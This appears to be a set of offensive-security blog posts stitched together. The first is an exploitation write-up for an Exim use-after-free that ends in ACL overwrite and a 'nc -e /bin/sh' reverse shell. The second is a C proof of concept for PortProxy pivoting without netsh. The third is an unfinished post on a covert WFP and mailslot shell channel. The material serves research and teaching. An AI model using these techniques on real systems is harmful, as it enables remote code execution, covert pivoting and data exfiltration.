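The two conditions under which store_extend_3() succeeds can be written down as a small predicate. This is a Python sketch of the check only, assuming an alignment of 8; the function names and the example addresses are made up.

```python
ALIGNMENT = 8  # assumption: typical value on 64-bit builds


def round_up(n):
    """Round n up to the next multiple of ALIGNMENT."""
    return n + (-n % ALIGNMENT)


def can_extend(ptr, oldsize, newsize, next_yield, yield_length):
    """Mirror of the early-return test in store_extend_3()."""
    inc = newsize - oldsize
    rounded_oldsize = round_up(oldsize)
    # 1. The allocation must be the most recent one in the block.
    if ptr + rounded_oldsize != next_yield:
        return False
    # 2. The extra bytes must fit in what is left of the block.
    if inc > yield_length + rounded_oldsize - oldsize:
        return False
    return True


# Last allocation in the block, plenty of room left.
print(can_extend(0x1000, 129, 257, next_yield=0x1088, yield_length=8000))
# Something else was allocated afterwards.
print(can_extend(0x1000, 129, 257, next_yield=0x10A8, yield_length=8000))
# Last allocation, but the block is almost full.
print(can_extend(0x1000, 129, 257, next_yield=0x1088, yield_length=64))
```

When the predicate is false the caller has to move the data elsewhere, which is exactly the case that relocates a growing string buffer.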
Exim uses something called gstrings as a growable string implementation.
This is the structure that defines it:
typedef struct gstring {
int size;
int ptr;
uschar *s;
} gstring;
- size: string buffer size.
- ptr: offset to the last character in the string buffer.
- uschar *s: pointer to the string buffer.
When we want to get a string we can use string_get():
gstring *
string_get(unsigned size)
{
gstring * g = store_get(sizeof(gstring) + size);
g->size = size;
g->ptr = 0;
g->s = US(g + 1);
return g;
}
It uses store_get() to allocate a buffer.
At gstring initialization, the string buffer is placed right after the struct.
When we want to append data to the growable string:
gstring *
string_catn(gstring * g, const uschar *s, int count)
{
int p;
if (!g)
{
unsigned inc = count < 4096 ? 127 : 1023;
unsigned size = ((count + inc) & ~inc) + 1;
g = string_get(size);
}
p = g->ptr;
if (p + count >= g->size)
gstring_grow(g, p, count);
memcpy(g->s + p, s, count);
g->ptr = p + count;
return g;
}
string_catn() first checks whether there is enough room; if not, it calls gstring_grow().
static void
gstring_grow(gstring * g, int p, int count)
{
int oldsize = g->size;
unsigned inc = oldsize < 4096 ? 127 : 1023;
g->size = ((p + count + inc) & ~inc) + 1;
if (!store_extend(g->s, oldsize, g->size))
g->s = store_newblock(g->s, g->size, p);
}
It first tries to extend the memory chunk within the same pool block. If that fails, a new block is allocated and the g->s pointer is replaced with the new buffer.
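The size arithmetic in string_catn() and gstring_grow() is easy to get wrong by eye, so here it is as a Python sketch. The two function names are made up; the formulas are copied from the C code above.

```python
def initial_size(count):
    """Buffer size chosen by string_catn() when the gstring does not exist yet."""
    inc = 127 if count < 4096 else 1023
    return ((count + inc) & ~inc) + 1


def grown_size(oldsize, p, count):
    """New buffer size chosen by gstring_grow() for p used bytes plus count new ones."""
    inc = 127 if oldsize < 4096 else 1023
    return ((p + count + inc) & ~inc) + 1


print(initial_size(10))              # small first write
print(grown_size(129, 120, 20))      # 140 bytes needed in a 129-byte buffer
print(grown_size(4097, 4000, 200))   # larger buffers grow in 1024-byte steps
```

Sizes are rounded to a multiple of 128 (or 1024 for large buffers) plus one, so the number of responses needed to force a grow is predictable.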
Access Control Lists (ACLs) are a type of configuration that allows you to change the behaviour of the server when it receives SMTP commands.
ACLs have long been a good way to achieve code execution when exploiting Exim vulnerabilities.
There is a specific string expansion item, run, that can be placed in an ACL and allows you to run a command.
Sample: ${run{ls -la}}
This is the one used when exploiting this vulnerability to execute code remotely.
Now that we understand how growable strings, the Exim pool allocator and ACLs work, let’s analyze the root cause of this vulnerability.
In tls-openssl.c, in tls_write():
int
tls_write(void * ct_ctx, const uschar *buff, size_t len, BOOL more)
{
int outbytes, error, left;
SSL * ssl = ct_ctx ? ((exim_openssl_client_tls_ctx *)ct_ctx)->ssl : server_ssl;
static gstring * corked = NULL;
DEBUG(D_tls) debug_printf("%s(%p, %lu%s)\n", __FUNCTION__,
buff, (unsigned long)len, more ? ", more" : "");
/* Lacking a CORK or MSG_MORE facility (such as GnuTLS has) we copy data when
"more" is notified. This hack is only ok if small amounts are involved AND only
one stream does it, in one context (i.e. no store reset). Currently it is used
for the responses to the received SMTP MAIL , RCPT, DATA sequence, only. */
/*XXX + if PIPE_COMMAND, banner & ehlo-resp for smmtp-on-connect. Suspect there's
a store reset there. */
if (!ct_ctx && (more || corked))
{
#ifdef EXPERIMENTAL_PIPE_CONNECT
int save_pool = store_pool;
store_pool = POOL_PERM;
#endif
corked = string_catn(corked, buff, len);
#ifdef EXPERIMENTAL_PIPE_CONNECT
store_pool = save_pool;
#endif
if (more)
return len;
buff = CUS corked->s;
len = corked->ptr;
corked = NULL;
}
for (left = len; left > 0;)
{
DEBUG(D_tls) debug_printf("SSL_write(%p, %p, %d)\n", ssl, buff, left);
outbytes = SSL_write(ssl, CS buff, left);
error = SSL_get_error(ssl, outbytes);
DEBUG(D_tls) debug_printf("outbytes=%d error=%d\n", outbytes, error);
switch (error)
{
case SSL_ERROR_SSL:
ERR_error_string_n(ERR_get_error(), ssl_errstring, sizeof(ssl_errstring));
log_write(0, LOG_MAIN, "TLS error (SSL_write): %s", ssl_errstring);
return -1;
case SSL_ERROR_NONE:
left -= outbytes;
buff += outbytes;
break;
case SSL_ERROR_ZERO_RETURN:
log_write(0, LOG_MAIN, "SSL channel closed on write");
return -1;
case SSL_ERROR_SYSCALL:
log_write(0, LOG_MAIN, "SSL_write: (from %s) syscall: %s",
sender_fullhost ? sender_fullhost : US"<unknown>",
strerror(errno));
return -1;
default:
log_write(0, LOG_MAIN, "SSL_write error %d", error);
return -1;
}
}
return len;
}
This function is the one that sends responses to the client when a TLS session is active.
corked is a static pointer, so its value persists across calls.
more, of type BOOL, specifies whether there is more data to buffer or whether the data can be returned to the user.
If more data needs to be copied, len is returned. Otherwise, corked is NULLed out and the contents of corked->s are returned to the client.
This means that we might be able to trigger a Use-After-Free condition if corked somehow does not get NULLed and a call to smtp_reset() is then performed: the content pointed to by corked will be freed.
If we reach tls_write() again, we will use the buffer after it has been freed.
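The lifetime problem can be reproduced with a toy model. The Python sketch below is a simulation under heavy assumptions, not Exim code: the heap is a 256-byte bytearray, the buffer has a fixed size, and the (s, ptr) pair is kept outside the heap, whereas the real gstring struct lives in the freed memory too.

```python
heap = bytearray(256)  # toy stand-in for one POOL_MAIN block
next_yield = 0         # bump pointer into `heap`
corked = None          # models the static `corked` pointer as (s, ptr)


def store_get(size):
    global next_yield
    ptr = next_yield
    next_yield += size
    return ptr


def store_reset(reset_point):
    # Rewinds the bump pointer only; holders of old pointers are not told.
    global next_yield
    next_yield = reset_point


def tls_write(data, more):
    """Return the bytes that would be handed to SSL_write(), or None."""
    global corked
    if more or corked is not None:
        if corked is None:
            corked = (store_get(64), 0)  # fixed-size buffer for brevity
        s, ptr = corked
        heap[s + ptr:s + ptr + len(data)] = data
        corked = (s, ptr + len(data))
        if more:
            return None                  # keep buffering, corked stays set
        s, ptr = corked
        corked = None                    # the only place it is cleared
        return bytes(heap[s:s + ptr])
    return bytes(data)


reset_point = store_get(0)
tls_write(b"250 OK\r\n", more=True)      # response buffered, corked stays set
store_reset(reset_point)                 # the buffer is "freed"
other = store_get(32)                    # an unrelated allocation reuses the space
heap[other:other + 8] = b"\xde\xad\xbe\xef\x00\x00\x55\x55"
leaked = tls_write(b"", more=False)      # the stale `corked` is used again
print(leaked.hex())
```

The bytes that come back are whatever the unrelated allocation stored in the reused region, which is the essence of the leak discussed further on.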
How can we put the server in that situation?
First we initialize a connection to the server, and send EHLO and STARTTLS to start a new TLS session so we can enter tls_write() on responses.
We then send either RCPT TO or MAIL FROM pipelined with a command like NOOP, but we send only the first half of the NOOP (NO). Then we close the TLS session to get back to plaintext and send the other half (OP\n). We are now back in plaintext and, as more = 1, the corked pointer won’t be NULLed.
Now sending a command like EHLO will end up calling smtp_reset(), which will free all the subsequent heap chunks and restore the yield pointer to reset_point.
Throughout the exploitation process we are dealing mostly with the POOL_MAIN pool.
We have a static variable containing a pointer to the middle of a buffer that has been freed. We need to use it to trigger the UAF.
To use it, we need to return to a TLS connection so that tls_write() is used again.
We send STARTTLS to start a new TLS session and finally send any command. When the server builds the response in tls_write(), corked will be used after free.
When I first triggered the bug, a function from the OpenSSL library reused my freed buffer and wrote binary data into it, resulting in a SIGSEGV due to an invalid memory address in corked->s:
gef➤ p *corked
$1 = {
size = 0x54595c9c,
ptr = 0xa7e800ba,
s = 0x7e35043433160bd3 <error: Cannot access memory at address 0x7e35043433160bd3>
}
gef➤ p corked
$2 = (gstring *) 0x555ad3be1b58
gef➤
Most memory corruption exploits nowadays need a memory leak to succeed and bypass mitigations like ASLR, PIE and many more.
As mentioned, this Use-After-Free itself allows a remote attacker to retrieve heap pointers.
As the buffer is freed, other functions will start using it, like functions that write heap pointers to the heap.
On responses, NULL bytes are allowed when in a TLS session. We just need the heap addresses we want to leak to be written in the range of memory from corked->s to corked->s + corked->ptr.
If an address is in that range, it will be returned to the client.
How can we get heap addresses written in that range?
Apart from doing some tests and debugging to see where to move our buffer and how, an interesting trick is pipelining RCPT TO commands together to make the response buffer string grow. This forces string_catn() to call gstring_grow(), which allocates the string buffer somewhere else.
This helps us overwrite the string buffer but not the gstring struct itself.
Once we have a memory leak, we can start searching for the Exim ACLs; once we identify the address where the ACL is located, we can write to it to finally achieve code execution.
To do so, we need to somehow craft an arbitrary read primitive that lets us read memory from the heap.
Thanks to this Use-After-Free, by grooming the heap we can overwrite the gstring struct, which would allow us to control:
- corked->size: size of string buffer
- corked->ptr: offset to last byte written
- corked->s: pointer to string buffer
Having this, on the next tls_write(), an arbitrary number of bytes from an arbitrary location will be sent to us when corked->s is accessed.
What about NULLs? They are strings, right?
Nope! The responses are returned to the client through SSL_write(), so there are no problems with NULLs; the limit is corked->ptr, which we control :).
With this technique we can read any memory we want from the heap, so we can iterate over memory blocks until we find the configuration by searching for a specific string.
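To make the read primitive concrete, the Python sketch below packs a forged gstring and shows which bytes a tls_write()-style reader would send for it. It assumes a little-endian LP64 target (int, int, 8-byte pointer, no padding); the helper names, the base address, and the toy memory contents are made up for illustration.

```python
import struct


def fake_gstring(size, ptr, s):
    """Pack `int size; int ptr; uschar *s;` as laid out on an LP64 target."""
    return struct.pack("<iiQ", size, ptr, s)


def tls_write_view(memory, base, gstring_bytes):
    """Bytes a reader would send for this gstring: `ptr` bytes starting at `s`."""
    size, ptr, s = struct.unpack("<iiQ", gstring_bytes)
    off = s - base
    return memory[off:off + ptr]


base = 0x555500000000                 # hypothetical heap base
memory = bytes(range(256))            # toy heap contents
g = fake_gstring(size=0x1000, ptr=16, s=base + 0x20)
print(len(g), tls_write_view(memory, base, g).hex())
```

Changing s selects where the read starts and changing ptr selects how much is read, NULL bytes included.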
How do I overwrite the gstring struct?
First we need to arrange the heap in such a way that we can successfully reuse the target chunk.
In smtp_setup_msg() we depend on the initial reset_point.
To avoid this… reading handle_smtp_call(), we can see there is a way to increase the reset_point used as the initial value in smtp_setup_msg().
if (!smtp_start_session())
{
mac_smtp_fflush();
search_tidyup();
_exit(EXIT_SUCCESS);
}
for (;;)
{
int rc;
message_id[0] = 0; /* Clear out any previous message_id */
reset_point = store_get(0); /* Save current store high water point */
DEBUG(D_any)
debug_printf("Process %d is ready for new message\n", (int)getpid());
/* Smtp_setup_msg() returns 0 on QUIT or if the call is from an
unacceptable host or if an ACL "drop" command was triggered, -1 on
connection lost, and +1 on validly reaching DATA. Receive_msg() almost
always returns TRUE when smtp_input is true; just retry if no message was
accepted (can happen for invalid message parameters). However, it can yield
FALSE if the connection was forcibly dropped by the DATA ACL. */
if ((rc = smtp_setup_msg()) > 0)
{
BOOL ok = receive_msg(FALSE);
search_tidyup(); /* Close cached databases */
if (!ok) /* Connection was dropped */
{
cancel_cutthrough_connection(TRUE, US"receive dropped");
mac_smtp_fflush();
smtp_log_no_mail(); /* Log no mail if configured */
_exit(EXIT_SUCCESS);
}
if (message_id[0] == 0) continue; /* No message was accepted */
}
else
{
if (smtp_out)
{
int i, fd = fileno(smtp_in);
uschar buf[128];
mac_smtp_fflush();
/* drain socket, for clean TCP FINs */
if (fcntl(fd, F_SETFL, O_NONBLOCK) == 0)
for(i = 16; read(fd, buf, sizeof(buf)) > 0 && i > 0; ) i--;
}
cancel_cutthrough_connection(TRUE, US"message setup dropped");
search_tidyup();
smtp_log_no_mail(); /* Log no mail if configured */
/*XXX should we pause briefly, hoping that the client will be the
active TCP closer hence get the TCP_WAIT endpoint? */
DEBUG(D_receive) debug_printf("SMTP>>(close on process exit)\n");
_exit(rc ? EXIT_FAILURE : EXIT_SUCCESS);
}
We can see that there is a possibility to return to smtp_setup_msg() with an increased reset_point.
When reading a message, the return value ok must be true, but we somehow need to make message_id[0] == 0. This happens in a specific situation.
Let’s read the receive_msg() code:
/* Handle failure due to a humungously long header section. The >= allows
for the terminating \n. Add what we have so far onto the headers list so
that it gets reflected in any error message, and back up the just-read
character. */
if (message_size >= header_maxsize)
{
OVERSIZE:
next->text[ptr] = 0;
next->slen = ptr;
next->type = htype_other;
next->next = NULL;
header_last->next = next;
header_last = next;
log_write(0, LOG_MAIN, "ridiculously long message header received from "
"%s (more than %d characters): message abandoned",
f.sender_host_unknown ? sender_ident : sender_fullhost, header_maxsize);
if (smtp_input)
{
smtp_reply = US"552 Message header is ridiculously long";
receive_swallow_smtp();
goto TIDYUP; /* Skip to end of function */
}
else
{
give_local_error(ERRMESS_VLONGHEADER,
string_sprintf("message header longer than %d characters received: "
"message not accepted", header_maxsize), US"", error_rc, stdin,
header_list->next);
/* Does not return */
}
}
If we send a really long line in a message (with no \n in it) that exceeds header_maxsize, an error is raised.
Despite the error, ok is true on return, but message_id[0] contains 0 :)
This means that in handle_smtp_call() we follow the continue and return to smtp_setup_msg() with an increased reset_point.
Qualys corrupted the struct through the AUTH parameter (one of the ESMTP parameters).
It is a good way to overwrite it, as it lets you encode binary data as a string with xtext. That string is decoded back to binary data when it is written to the allocated buffer.
However, I did not go that way. I used the message channel itself to send binary data, and I had no problems with it.
So I was able to overwrite the struct through a message and control all of its fields.
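For reference, the xtext encoding mentioned above is defined in RFC 3461: printable ASCII characters other than "+" and "=" are sent literally, and every other byte becomes "+" followed by two uppercase hex digits. The following is a minimal, generic sketch of that encoding in Python 3. The function names are made up for illustration, and Exim's own decoder may behave differently on malformed input.

```python
import re


def xtext_encode(data: bytes) -> str:
    """Encode bytes as RFC 3461 xtext."""
    out = []
    for b in data:
        # Printable ASCII (0x21-0x7E) except '+' (0x2B) and '=' (0x3D) stays literal.
        if 0x21 <= b <= 0x7E and b not in (0x2B, 0x3D):
            out.append(chr(b))
        else:
            out.append("+%02X" % b)
    return "".join(out)


def xtext_decode(text: str) -> bytes:
    """Decode xtext back to raw bytes: each '+XX' becomes the byte 0xXX."""
    return re.sub(
        rb"\+([0-9A-F]{2})",
        lambda m: bytes([int(m.group(1), 16)]),
        text.encode("ascii"),
    )
```

This is why the parameter is convenient for carrying binary data: any byte value, including NUL, survives the trip as plain ASCII.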
We now know the address where the target configuration is stored.
Using the same technique I used to overwrite the target gstring struct, we can craft a write-what-where primitive.
This time corked->size must be a high value. corked->ptr must be zero so that the response starts being written directly at corked->s.
corked->s will contain the address where we want to write the response to the command that triggers the UAF.
Once we overwrite the gstring struct with those values, we need to trigger the use-after-free by initializing a TLS session again.
We send an invalid MAIL FROM command so that part of our command is echoed back in the response, which allows us to write arbitrary data.
The ACL is now overwritten by our custom command, but how do we get it executed?
Once the ACL is corrupted (in this case I overwrote the ACL for MAIL FROM commands), we need that ACL to be interpreted by expand_cstring(). To do so, after the MAIL FROM we used to overwrite the ACL, we can pipeline another command (MAIL FROM again, as the previous one failed), which passes the ACL to expand_cstring() and finally executes the command.
I had a problem with the maximum number of arguments. I could not run nc -e/bin/sh <ip> <port> because only two arguments were allowed. So I used this command instead: /bin/sh -c 'nc -e/bin/sh <ip> <port>'.
Now there is no max_args problem and the command is executed, resulting in a reverse shell:
The full exploit can be found here.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is a call to an (un)holy crusade: we have to banish the usage of commands in compromised machines and start to embrace coding. Please, take a seat and listen to the story of netsh and PortProxy.
The intention of this short article is to encourage people to improve their tradecraft. We use netsh here as a mere example to transmit the core idea: we need to move from commands to tasks coded in our implants/tools.
There are tons of ways to tunnel your traffic through a compromised machine. Probably the most common can be dropping an implant that implements a SOCKS4/5 proxy, so you can route your traffic through that computer and run your tools against other network segments previously inaccessible. But in some scenarios we can’t just deploy our socks proxy listening to an arbitrary port and we need to rely on native tools, like the well-known netsh.
Forwarding traffic from one port to another machine is trivial with netsh. For example, if we want to connect to the RDP service exposed by a server (let’s call it C) at 10.2.0.12 and we need to use B (10.1.0.233) as pivot, the command line would look like:
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.2.0.12
Then we only need to use our favorite RDP client and point it to B (10.1.0.233) at port 1337. Easy peachy.
But how does netsh work, and what is happening under the hood? Can we implement this functionality ourselves so we can avoid using the well-known netsh?
The first thing to do (after googling) when we have to play with something in Windows is to take a look at ReactOS and Wine projects (usually both are a goldmine) but this time we were unlucky:
#include "wine/debug.h"
WINE_DEFAULT_DEBUG_CHANNEL(netsh);
int __cdecl wmain(int argc, WCHAR *argv[])
{
int i;
WINE_FIXME("stub:");
for (i = 0; i < argc; i++)
WINE_FIXME(" %s", wine_dbgstr_w(argv[i]));
WINE_FIXME("\n");
return 0;
}
So let’s try to execute netsh and take a look at it with Process Monitor:
In Process Monitor the only thing related to “PortProxy” is the creation of a value with the forwarding info (source and destination) inside the key HKLM\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp. If we google this key we can find a lot of articles about DFIR and how this key can be used to detect this particular TTP in forensic analysis (for example: Port Proxy detection - How can we see port proxy configurations in DFIR?).
If we create this registry value manually nothing happens, so we need something more to trigger the proxy creation. What are we missing? Well, that question is easy to answer. Let’s see what happened with our previous netsh execution with TCPView:
As we can see, iphlpsvc (IP Helper Service) is in charge of creating the “portproxy”. So netsh should “contact” this service in order to trigger the proxy creation, but how is this done? We should open iphlpsvc.dll in Binary Ninja and look for references to “PortProxy”. (Spoiler: it uses the paramchange control code, so we can trigger it easily with sc)
We have a hit with a registry key similar to the one that we were looking for…
…so we can start the old and dirty game of following the call cascade (cross-reference party!) until we reach something really interesting (note: OnConfigChange is a function renamed by us):
We got it! If a paramchange control code arrives at iphlpsvc, it reads the PortProxy configuration from the registry again and acts according to the info retrieved.
We can translate netsh PortProxy into the creation of a registry value followed by sending a paramchange control code to the IP Helper service. In other words, we can execute these commands:
reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp /t REG_SZ /v 0.0.0.0/49777 /d 192.168.8.128/80
sc control iphlpsvc paramchange
reg delete HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4 /f
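To make the mapping between the netsh arguments and the registry value explicit, here is a small Python 3 sketch. It only builds strings: the value name is the listening address/port and the value data is the connect address/port, as seen in the commands above. The helper names and the control_set parameter are assumptions added for illustration (passing "CurrentControlSet" avoids hardcoding the control set number).

```python
def portproxy_entry(listen_addr, listen_port, connect_addr, connect_port,
                    control_set="ControlSet001"):
    """Return (key, value_name, value_data) for a v4tov4 PortProxy entry."""
    key = ("HKEY_LOCAL_MACHINE\\SYSTEM\\%s\\Services\\PortProxy\\v4tov4\\tcp"
           % control_set)
    value_name = "%s/%d" % (listen_addr, listen_port)    # where the pivot listens
    value_data = "%s/%d" % (connect_addr, connect_port)  # where traffic is forwarded
    return key, value_name, value_data


def reg_add_command(key, value_name, value_data):
    """Format the equivalent 'reg add' command line."""
    return "reg add %s /t REG_SZ /v %s /d %s" % (key, value_name, value_data)
```

For the RDP example from the beginning of the article, portproxy_entry("0.0.0.0", 1337, "10.2.0.12", 3389) gives the value name 0.0.0.0/1337 and the data 10.2.0.12/3389.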
It’s time to translate our commands into a shitty PoC in C:
// PortProxy PoC
// @TheXC3LL
#include <Windows.h>
#include <stdio.h>
DWORD iphlpsvcUpdate(void) {
SC_HANDLE hManager;
SC_HANDLE hService;
SERVICE_STATUS serviceStatus;
DWORD retStatus = 0;
DWORD ret = -1;
hManager = OpenSCManagerA(NULL, NULL, GENERIC_READ);
if (hManager) {
hService = OpenServiceA(hManager, "IpHlpSvc", SERVICE_PAUSE_CONTINUE | SERVICE_QUERY_STATUS);
if (hService) {
printf("[*] Connected to IpHlpSvc\n");
retStatus = ControlService(hService, SERVICE_CONTROL_PARAMCHANGE, &serviceStatus);
if (retStatus) {
printf("[*] Configuration update requested\n");
ret = 0;
}
else {
printf("[!] ControlService() failed!\n");
}
CloseServiceHandle(hService);
CloseServiceHandle(hManager);
return ret;
}
CloseServiceHandle(hManager);
printf("[!] OpenServiceA() failed!\n");
return ret;
}
printf("[!] OpenSCManager() failed!\n");
return ret;
}
DWORD addEntry(LPSTR source, LPSTR destination) {
LPCSTR v4tov4 = "SYSTEM\\ControlSet001\\Services\\PortProxy\\v4tov4\\tcp";
HKEY hKey = NULL;
LSTATUS retStatus = 0;
DWORD ret = -1;
retStatus = RegCreateKeyExA(HKEY_LOCAL_MACHINE, v4tov4, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (retStatus == ERROR_SUCCESS) {
retStatus = (RegSetValueExA(hKey, source, 0, REG_SZ, (LPBYTE)destination, strlen(destination) + 1));
if (retStatus == ERROR_SUCCESS) {
printf("[*] New entry added\n");
ret = 0;
}
else {
printf("[!] RegSetValueExA() failed!\n");
}
RegCloseKey(hKey);
return ret;
}
printf("[!] RegCreateKeyExA() failed!\n");
return ret;
}
DWORD deleteEntry(LPSTR source) {
LPCSTR v4tov4 = "SYSTEM\\ControlSet001\\Services\\PortProxy\\v4tov4\\tcp";
HKEY hKey = NULL;
LSTATUS retStatus = 0;
DWORD ret = -1;
retStatus = RegCreateKeyExA(HKEY_LOCAL_MACHINE, v4tov4, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (retStatus == ERROR_SUCCESS) {
retStatus = RegDeleteKeyValueA(HKEY_LOCAL_MACHINE, v4tov4, source);
if (retStatus == ERROR_SUCCESS) {
printf("[*] New entry deleted\n");
ret = 0;
}
else {
printf("[!] RegDeleteKeyValueA() failed!\n");
}
RegCloseKey(hKey);
return ret;
}
printf("[!] RegCreateKeyExA() failed!\n");
return ret;
}
int main(int argc, char** argv) {
printf("\t\t-=<[ PortProxy PoC by @TheXC3LL ]>=-\n\n");
if (argc <= 2) {
printf("[!] Invalid syntax! Usage: PortProxy.exe SOURCE_IP/PORT DESTINATION_IP/PORT (example: ./PortProxy.exe 0.0.0.0/1337 10.0.2.2/22)\n");
return 1; /* Bail out: argv[1] and argv[2] are not available */
}
if (addEntry(argv[1], argv[2]) != -1) {
if (iphlpsvcUpdate() == -1) {
printf("[!] Something went wrong :S\n");
}
if (deleteEntry(argv[1]) == -1) {
printf("[!] Troubles deleting the entry, please try it manually!!\n");
}
}
return 0;
}
Fire in the hole!
EDIT (2021/06/19): A reader pointed out that “ControlSet001” is the “normal” control set, but in some scenarios the number can change (002, 003, etc.), so instead of using it directly we should use HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet.
As we stated at the beginning, this short article is not about “netsh” or the “PortProxy” functionality. We aim higher: we want to encourage you to stop using commands blindly and to start digging into what your machine is doing. Explore and learn the internals of everything you do in a red team operation or a pentest.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how a fool started to play with the idea of controlling a shell remotely without listening on any port (bind shell) or connecting back to it (reverse shell). Please, take a seat and listen to the story of a journey to the No-Sockets Land.
Of course, declaring that we can communicate with another machine without sockets is a tricky affirmation: sockets, in one way or another, are needed. We are going to explore the usage of two covert channels to transmit information to and from our remote shell, so there are no “direct connections” between the two machines (or in other words: our implant is not going to bind to a local port and it is not going to connect back to our machine; we are going to explore an alternative way). Just have fun and don’t be harsh on us because we used the term “connectionless” :P
This post came after crafting a small PoC to satisfy our curiosity. The tactic of keeping a few compromised machines “quiet” (without communication with the C2) until a pre-shared combination of ports is hit is something that @TheXC3LL shared in his article “Stealthier communications & Port Knocking via Windows Filtering Platform (WFP)”.
In the article our owl explained how some “clean boxes” are left behind until they need to be retaken. When the Red Team needs to reactivate the communication with its implant they just “knock” on a few predefined ports and the implant wakes up again. To do this the implant uses the Windows Filtering Platform APIs to monitor the firewall events and to check for incoming UDP packets (source and destination port/IP); if the predefined condition is met, it connects back to a fallback C2 or just fires a reverse shell.
Here, in our PoC, we are going to use this technique partially. As we do not want to “create” a socket in the compromised machine, and we need to communicate with our implant in some way, we use a wicked approach based on Port Knocking. Or we should call it “reverse” Port Knocking.
Instead of “knocking” on different ports, we “knock” on a single port but change the source port. This source port is our covert channel: we can use those two bytes to transmit information. So here is the thing… the events collected from WFP are our inbound channel.
We just found a way to transmit information to our implant, but how are we going to exfiltrate the output of our inputs/commands? Well, this is where mailslots come into play. From Microsoft:
A mailslot is a mechanism for one-way interprocess communications (IPC). Applications can store messages in a mailslot. (...). These messages are typically sent over a network to either a specified computer **or to all computers in a specified domain**. (...)
(...) Mailslots, on the other hand, are a simple way for a process to broadcast messages to multiple processes. One important consideration is that mailslots broadcast messages using datagrams. A datagram is a small packet of information that the network sends along the wire. Like a radio or television broadcast, a datagram offers no confirmation of receipt; there is no way to guarantee that a datagram has been received.(...)
Ok, we can use mailslots to broadcast the output over the network and then wait patiently at our end to read the output. Where is the fun? Well… every Windows machine is using mailslots continuously. Your machine is broadcasting datagrams like a minigun. Have you ever found those “BROWSER” packets in Wireshark?
Yep, the CIFS Browser protocol uses the mailslot \MAILSLOT\BROWSE, so we can smuggle the output of our shell here. This is gonna be our outbound channel.
After this brief introduction, let’s dig a bit!
As first contact we can reuse the code to monitor the events and add a minor edit to print the source ports:
#include <windows.h>
#include <fwpmtypes.h>
#include <fwpmu.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib, "fwpuclnt.lib")
#pragma comment (lib, "Ws2_32.lib")
#define EXIT_ON_ERROR(err) if((err) != ERROR_SUCCESS) {goto CLEANUP;}
FILETIME ft;
DWORD InitFilterConditions(
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 numCondsIn,
__out_ecount_part(numCondsIn, *numCondsOut) FWPM_FILTER_CONDITION0* conds,
__out UINT32* numCondsOut,
__deref_out FWP_BYTE_BLOB** appId
)
{
*numCondsOut = 0;
return ERROR_SUCCESS;
}
DWORD FindRecentEvents(
__in HANDLE engine,
__in_opt PCWSTR appPath,
__in_opt const SOCKADDR* localAddr,
__in_opt UINT8 ipProtocol,
__in UINT32 seconds,
__deref_out_ecount(*numEvents) FWPM_NET_EVENT0*** events,
__out UINT32* numEvents
)
{
DWORD result = ERROR_SUCCESS;
FWPM_NET_EVENT_ENUM_TEMPLATE0 enumTempl;
ULARGE_INTEGER ulTime;
FWPM_FILTER_CONDITION0 conds[4];
UINT32 numConds;
FWP_BYTE_BLOB* appBlob = NULL;
HANDLE enumHandle = NULL;
memset(&enumTempl, 0, sizeof(enumTempl));
// Use the current time as the end time of the window.
GetSystemTimeAsFileTime(&(enumTempl.endTime));
// Subtract the number of seconds specified by the caller to find the start
// time.
ulTime.LowPart = enumTempl.endTime.dwLowDateTime;
ulTime.HighPart = enumTempl.endTime.dwHighDateTime;
ulTime.QuadPart -= seconds * 10000000ui64;
enumTempl.startTime.dwLowDateTime = ulTime.LowPart;
enumTempl.startTime.dwHighDateTime = ulTime.HighPart;
result = InitFilterConditions(
appPath,
localAddr,
ipProtocol,
ARRAYSIZE(conds),
conds,
&numConds,
&appBlob
);
EXIT_ON_ERROR(result);
enumTempl.numFilterConditions = numConds;
if (numConds > 0)
{
enumTempl.filterCondition = conds;
}
result = FwpmNetEventCreateEnumHandle0(
engine,
&enumTempl,
&enumHandle
);
EXIT_ON_ERROR(result);
result = FwpmNetEventEnum0(
engine,
enumHandle,
INFINITE,
events,
numEvents
);
EXIT_ON_ERROR(result);
CLEANUP:
FwpmNetEventDestroyEnumHandle0(engine, enumHandle);
FwpmFreeMemory0((void**)&appBlob);
return result;
}
void detectHit(void) {
struct in_addr rinaddr;
HANDLE engineHandle = 0;
FWPM_NET_EVENT0** events = NULL, * event;
UINT32 numEvents = 0, i;
static const char* const types[] =
{
"FWPM_NET_EVENT_TYPE_IKEEXT_MM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_QM_FAILURE",
"FWPM_NET_EVENT_TYPE_IKEEXT_EM_FAILURE",
"FWPM_NET_EVENT_TYPE_CLASSIFY_DROP",
"FWPM_NET_EVENT_TYPE_IPSEC_KERNEL_DROP"
};
const char* type;
// Use dynamic sessions for efficiency and safety:
// - All objects associated with the dynamic session are deleted with one call.
// - Filtering policy objects are deleted even when the application crashes.
FWPM_SESSION0 session;
memset(&session, 0, sizeof(session));
session.flags = FWPM_SESSION_FLAG_DYNAMIC;
DWORD result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, &session, &engineHandle);
if (ERROR_SUCCESS == result)
{
result = FindRecentEvents(
engineHandle,
0,
0,
0,
100,
&events,
&numEvents
);
}
if (numEvents != 0)
{
for (i = 0; i < numEvents; ++i)
{
event = events[i];
type = (event->type < ARRAYSIZE(types)) ? types[event->type]
: "<unknown>";
if (event->header.ipVersion == FWP_IP_VERSION_V4 && event->header.ipProtocol == IPPROTO_UDP
&& (event->header.timeStamp.dwHighDateTime > ft.dwHighDateTime
